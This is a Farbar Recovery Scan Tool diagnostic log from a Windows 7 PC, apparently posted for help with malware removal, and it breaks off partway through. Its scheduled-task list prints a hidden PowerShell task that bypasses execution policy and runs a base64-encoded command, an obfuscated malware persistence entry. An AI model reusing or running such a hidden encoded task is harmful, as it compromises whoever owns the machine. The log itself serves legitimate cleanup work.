2015-12-23 02:20 - 2015-11-10 00:50 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-10 00:44 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2015-12-23 02:20 - 2015-11-10 00:36 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-12-23 02:20 - 2015-11-10 00:36 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-12-23 02:20 - 2015-11-10 00:14 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-12-23 02:20 - 2015-11-10 00:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-12-23 02:20 - 2015-11-08 23:33 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-12-23 02:20 - 2015-11-08 23:32 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-08 23:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-12-23 02:20 - 2015-11-08 23:01 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-12-23 02:20 - 2015-11-08 22:52 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-12-23 02:20 - 2015-11-08 22:40 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-08 22:32 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-12-23 02:20 - 2015-11-08 22:29 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-12-23 02:20 - 2015-11-08 21:41 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-12-23 02:20 - 2015-11-05 20:05 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00014848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2015-12-23 02:20 - 2015-11-05 20:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2015-12-23 02:20 - 2015-11-05 10:53 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2015-12-23 02:20 - 2015-11-03 20:04 - 00802304 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2015-12-23 02:20 - 2015-11-03 19:56 - 00627712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2015-12-23 02:19 - 2015-11-11 17:21 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-12-23 02:19 - 2015-11-11 16:12 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-12-23 02:19 - 2015-11-10 01:24 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-12-23 02:19 - 2015-11-10 01:12 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-12-23 02:19 - 2015-11-10 01:03 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-12-23 02:19 - 2015-11-10 00:47 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-12-23 02:19 - 2015-11-10 00:46 - 04514816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-12-23 02:19 - 2015-11-10 00:37 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-12-23 02:19 - 2015-11-10 00:35 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-10 00:17 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-12-23 02:19 - 2015-11-08 23:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00571392 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-12-23 02:19 - 2015-11-08 23:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-12-23 02:19 - 2015-11-08 23:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-12-23 02:19 - 2015-11-08 23:04 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-12-23 02:19 - 2015-11-08 23:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-12-23 02:19 - 2015-11-08 22:48 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-12-23 02:19 - 2015-11-08 22:35 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-12-23 02:19 - 2015-11-08 22:18 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-08 22:13 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-12-23 02:19 - 2015-11-08 21:53 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-12-23 02:19 - 2015-11-08 21:30 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-12-23 02:18 - 2015-11-03 20:04 - 00241664 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2015-12-23 02:18 - 2015-11-03 19:55 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\els.dll
2015-12-23 02:13 - 2015-12-23 02:13 - 00019320 _____ C:\Windows\System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{08a2d2e5-4064-0}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{07fc38b7-3064-1}

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-25 23:58 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-25 23:55 - 2014-09-26 23:46 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Spotify
2015-12-25 23:42 - 2014-06-02 00:55 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-25 23:42 - 2014-05-20 22:58 - 00000992 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-25 23:41 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-25 23:41 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-25 23:39 - 2009-07-14 10:16 - 00495838 _____ C:\Windows\system32\perfh014.dat
2015-12-25 23:39 - 2009-07-14 10:16 - 00096254 _____ C:\Windows\system32\perfc014.dat
2015-12-25 23:39 - 2009-07-14 06:13 - 01365432 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-25 23:39 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-25 23:34 - 2014-09-26 23:47 - 00000000 ____D C:\Users\Simon\AppData\Local\Spotify
2015-12-25 23:33 - 2014-05-20 22:58 - 00000988 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-25 23:33 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-25 23:22 - 2015-06-12 18:39 - 00000000 ____D C:\Users\Simon\AppData\Local\Adobe
2015-12-25 22:11 - 2015-04-19 23:32 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieBrowserModeList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieUserList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieSiteList
2015-12-25 22:00 - 2009-07-14 03:34 - 00000215 _____ C:\Windows\system.ini
2015-12-25 22:00 - 2009-07-14 03:34 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts.old
2015-12-25 21:47 - 2014-05-20 22:59 - 00002177 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-25 21:37 - 2014-05-20 22:58 - 00003988 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-25 21:37 - 2014-05-20 22:58 - 00003736 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-25 21:33 - 2015-03-29 22:17 - 00000000 ____D C:\Program Files (x86)\Chime
2015-12-25 21:33 - 2015-01-28 23:35 - 00000000 ____D C:\Program Files (x86)\nicEdeeall
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\UpDown page without arrows
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\nicedeial
2015-12-25 21:17 - 2015-05-17 00:39 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries Engine 3 Client
2015-12-25 21:17 - 2014-05-21 05:16 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries_ApS
2015-12-25 21:17 - 2014-05-21 05:15 - 00000000 ____D C:\Users\Simon\AppData\Roaming\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\ProgramData\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:09 - 00000000 ____D C:\Program Files\SteelSeries
2015-12-25 21:17 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-12-25 21:16 - 2014-10-07 19:03 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Equalify
2015-12-25 21:15 - 2014-05-29 18:59 - 00000000 ____D C:\Users\Simon\AppData\Roaming\uTorrent
2015-12-25 21:14 - 2014-05-21 05:03 - 00000000 ____D C:\Users\Simon\AppData\Local\CrashDumps
2015-12-25 21:02 - 2015-07-03 21:25 - 00072415 _____ C:\Users\Simon\Desktop\cfg.rar
2015-12-25 20:45 - 2009-07-14 05:45 - 04951560 _____ C:\Windows\system32\FNTCACHE.DAT
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\system32\GWX
2015-12-23 03:13 - 2014-05-20 19:25 - 01341938 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2015-12-23 03:06 - 2014-05-20 21:51 - 00000000 ____D C:\Windows\system32\MRT
2015-12-23 03:02 - 2014-05-20 21:51 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-12-07 03:29 - 2014-12-24 22:10 - 00000000 ____D C:\Windows\system32\appraiser
2015-12-07 03:29 - 2014-05-21 14:11 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-12-07 03:29 - 2009-07-14 10:54 - 00000000 ____D C:\Program Files\Windows Journal
2015-12-02 13:18 - 2014-05-23 16:14 - 00301728 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

==================== Files in the root of some directories =======

2014-09-06 19:36 - 2014-09-06 19:36 - 1177208 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanupTool.exe
2014-09-06 19:36 - 2014-09-06 19:36 - 1176696 _____ () C:\Users\Simon\AppData\Roaming\AndyCleanVM.exe
2014-12-02 19:05 - 2015-06-29 19:41 - 0001456 _____ () C:\Users\Simon\AppData\Local\Adobe Save for Web 13.0 Prefs
2015-05-30 13:19 - 2015-05-30 13:27 - 0000000 _____ () C:\Users\Simon\AppData\Local\Driver_LOM_8161Present.flag
2015-05-18 15:37 - 2015-05-18 15:37 - 0007597 _____ () C:\Users\Simon\AppData\Local\Resmon.ResmonCfg
2015-04-13 22:45 - 2015-04-14 02:01 - 0011710 _____ () C:\Users\Simon\AppData\Local\Temp-log.txt

Some files in TEMP:
====================
C:\Users\Simon\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-12-25 22:58

==================== End of FRST.txt ============================

Then the addon log:

Additional scan result of Farbar Recovery Scan Tool (x64) Version:25-12-2015
Ran by Simon (2015-12-25 23:58:54)
Running from C:\Users\Simon\Downloads
Windows 7 Professional Service Pack 1 (X64) (2014-05-20 18:13:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1743091598-2114630970-4208458173-500 - Administrator - Disabled)
Gjest (S-1-5-21-1743091598-2114630970-4208458173-501 - Limited - Disabled)
Simon (S-1-5-21-1743091598-2114630970-4208458173-1000 - Administrator - Enabled) => C:\Users\Simon

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.1.418 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Illustrator CC (HKLM-x32\...\{F2321021-08A2-44D6-B1DF-BDB415F23EC3}) (Version: 17.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\Adobe Photoshop CS6) (Version: 13.0.0.0 - © The Computer Guy Tony)
Adobe Premiere Pro CC 2014 (HKLM-x32\...\{07BE616F-9E42-4C90-AF4F-0F32A5B088E7}) (Version: 8.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.11) - Norsk (HKLM-x32\...\{AC76BA86-7AD7-1044-7B44-AB0000000001}) (Version: 11.0.11 - Adobe Systems Incorporated)
Bandicam (HKLM-x32\...\Bandicam) (Version: 2.1.0.708 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Box Edit (HKLM-x32\...\{145BEAC3-F9E4-432B-AFD3-D36216C4C355}) (Version: 3.0.24.493 - Box)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ETDWare PS/2-X64 11.13.6.2_WHQL (HKLM\...\Elantech) (Version: 11.13.6.2 - ELAN Microelectronic Corp.)
Fotogalleri (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version:  - Nota Inc.)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3412 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.3.34 - Intel Corporation)
Intel® PROSet/Wireless-programvare (HKLM-x32\...\{105fa5c4-72e1-41f2-a82c-884d8aa4b381}) (Version: 16.6.0 - Intel Corporation)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
K-Lite Codec Pack 10.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.5 - )
Malwarebytes Anti-Malware versjon 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 43.0.2 (x86 nb-NO) (HKLM-x32\...\Mozilla Firefox 43.0.2 (x86 nb-NO)) (Version: 43.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.2 - Mozilla)
MSI Afterburner 4.1.0 (HKLM-x32\...\Afterburner) (Version: 4.1.0 - MSI Co., LTD)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation)
NVIDIA Grafikkdriver 347.25 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 347.25 - NVIDIA Corporation)
NVIDIA PhysX systemprogramvare 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
OpenOffice 4.1.1 (HKLM-x32\...\{FBEB2D26-74E6-4DEE-B6CE-0EB3B92DE777}) (Version: 4.11.9775 - Apache Software Foundation)
Oracle VM VirtualBox 4.3.12 (HKLM\...\{B5121457-0126-4E62-BCBF-6DC7C73D9E4A}) (Version: 4.3.12 - Oracle Corporation)
PDF Settings CC (x32 Version: 12.0 - Adobe Systems Incorporated) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21249 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7179 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{9DAABC60-A5EF-41FF-B2B9-17329590CD5}) (Version: 1.00.0235 - REALTEK Semiconductor Corp.)
SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Spotify) (Version: 1.0.20.94.g8f8543b3 - Spotify AB)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tixati (HKLM-x32\...\tixati) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
XSplit Gamecaster (HKLM-x32\...\{192BAAFE-0440-45C5-8E9C-FA6F8581EC8F}) (Version: 1.5.1401.2102 - SplitMediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {09243C41-78C6-4705-8A44-74ADF37148A0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {15DCE0F0-4638-4ED2-8AE8-E66A1F6E8071} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Task: {204D1C36-0B82-472C-9C74-22463EC1EE14} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {2082BF41-00C5-4D3E-96FC-2E0BE3811523} - System32\Tasks\AdobeAAMUpdater-1.0-Simon-PC-Simon => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
Task: {3DBE0C46-2759-4AD2-B89E-6C57BF404C98} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {43F525B2-5189-4065-ACCB-7B97D48305FD} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {48E19AF3-2DD9-4715-A5DA-EF87694CDB2A} - System32\Tasks\{B9242E84-7B66-4DAB-9F83-6C1F55A37D6E} => pcalua.exe -a E:\Autorun.exe -d E:\
Task: {55749066-36D7-4CAF-88BF-B6CB1C3EF9EE} - System32\Tasks\{353FBC57-6237-441C-B63B-98BC2D9D416F} => pcalua.exe -a E:\CDSetup.exe -d E:\
Task: {6D238D9B-024B-4127-95BE-82B7AA15D31D} - System32\Tasks\{9C7E7CD6-234F-42F0-A024-3B1422CA0E10} => Firefox.exe hxxp://ui.skype.com/ui/0/7.4.0.102/no/abandoninstall?page=tsProgressBar
Task: {7F87DC8C-6CDF-4B37-BCB4-18B00E818746} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-25] (Google Inc.)
Task: {883668A6-F707-4DDF-A886-505891E36532} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {8ED8F4F8-4365-4431-AA39-7536BCA6F5A1} - System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAA